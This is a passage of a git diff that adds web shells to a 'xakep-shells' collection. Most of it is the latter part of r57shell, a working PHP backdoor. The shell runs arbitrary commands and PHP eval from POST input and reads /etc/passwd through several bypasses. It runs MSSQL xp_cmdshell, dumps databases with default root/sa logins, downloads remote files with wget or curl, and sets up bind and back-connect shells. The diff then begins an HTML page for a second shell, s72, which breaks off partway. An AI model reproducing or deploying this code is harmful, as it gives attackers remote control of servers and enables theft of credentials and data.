+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mssql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] HATA! MySQL Server ile Baglanti Kurulamiyor...";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-]HATA! MysQl Server ile baglanti Kurulamiyor";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] HATA! Database Secilemedi";
+   @mysql_close($db);
+   }
+  else echo "[-] HATA! MysQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] HATA! Database ile baglanti kurulamiyor";
+   @mssql_close($db);
+  }
+  else echo "[-] HATA! MssQl Server ile baglanti Kurulamiyor";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-]HATA! PostgreSQL  Server ile baglanti Kurulamiyor";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] HATA! Dump dosyalari yazilabilir degil"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
+
diff --git a/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt b/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt	
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
